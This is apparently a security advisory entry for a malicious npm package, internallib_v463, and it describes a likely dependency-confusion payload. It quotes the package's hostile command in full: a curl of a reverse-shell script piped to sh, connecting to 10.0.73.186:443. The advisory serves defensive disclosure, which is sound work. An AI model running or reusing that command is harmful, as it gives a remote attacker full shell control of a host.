MAL-2026-16481
Malicious code in internallib_v463 (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0b01ff1527598f64a1da93492377bfd066f37519d0c589285136d9a31615d1b7) index.js exports a function `command` that runs `/bin/bash -c "curl https://reverse-shell.sh/10.0.73.186:443|sh"`, fetching a reverse-shell script from reverse-shell.sh and piping it to sh. When the exported function is invoked by a consumer of this package, an interactive shell is established outbound to the hardcoded attacker endpoint 10.0.73.186:443, granting a remote party full shell control of the installer host. The module contains a `console.log("Primeiro PWN")` string, consistent with hostile intent rather than a legitimate utility. The package name (`internallib_v463`) and the private-range destination IP are consistent with a dependency-confusion payload targeting an internal package name.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for internallib_v463 (npm). Pin to a known-safe version or switch to an alternative.